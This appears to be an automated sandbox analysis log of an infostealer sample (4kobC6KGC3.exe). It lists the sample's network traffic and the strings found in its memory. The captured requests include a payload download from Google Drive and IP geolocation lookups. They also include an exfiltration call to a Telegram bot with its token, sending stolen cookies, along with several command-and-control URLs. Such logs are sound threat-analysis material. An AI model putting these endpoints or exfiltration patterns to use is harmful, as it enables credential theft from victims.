            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49767 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49763 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49765 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49766 -> 104.21.64.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49759 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/03/2025%20/%2001:30:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd603c4f928882Host: api.telegram.orgContent-Length: 2064
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:30:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 4kobC6KGC3.exe, 00000000.00000002.50856626273.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 4kobC6KGC3.exe, 00000000.00000000.49420945432.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4kobC6KGC3.exe, 00000002.00000000.50855236832.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038180000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000380A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ
            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQQ
            Source: 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/2
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/X
            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=download
            Source: 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=downloadk
            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w5K_rjYxGmFbad2NSO4RzUZb1c3XqQqQ&export=downloadx
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.0000000007A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/l
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eicar.org/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FD000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381AD000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381FB000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079E7000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985470415.00000000079EC000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50953102950.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266740517.00000000079EA000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.50985246968.00000000079E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003803A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003803A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003803A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.227.220
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039240000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
